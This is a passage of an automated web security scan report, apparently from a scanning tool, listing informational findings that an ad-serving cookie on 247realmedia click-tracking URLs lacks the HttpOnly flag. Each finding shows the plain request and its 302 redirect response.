Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.406. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/13627994/Left/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/13627994/Left/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/13627994/Left/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:36:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.407. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1384536630/Top/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/1384536630/Top/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1384536630/Top/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.408. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1408846600/Middle/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/1408846600/Middle/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1408846600/Middle/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.409. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1606215913/BottomRight/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/1606215913/BottomRight/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1606215913/BottomRight/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:36:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.410. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1812286391/x04/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/1812286391/x04/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1812286391/x04/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.411. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/2062153072/x01/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/2062153072/x01/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/2062153072/x01/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.412. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/2117805232/Left2/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/2117805232/Left2/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/2117805232/Left2/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.413. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/258558596/Bottom2/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/258558596/Bottom2/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/258558596/Bottom2/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:36:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.414. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/327792408/Bottom1/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/327792408/Bottom1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/327792408/Bottom1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:36:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.415. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/402494553/Left3/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/402494553/Left3/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/402494553/Left3/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.416. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/54249257/x03/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/54249257/x03/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/54249257/x03/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.417. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/542573873/Bottom/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/542573873/Bottom/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/542573873/Bottom/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:36:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.418. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/701883874/Right2/default/empty.gif/7263485738303033424c73414270536c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/NaN/701883874/Right2/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/701883874/Right2/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:54:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.422. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

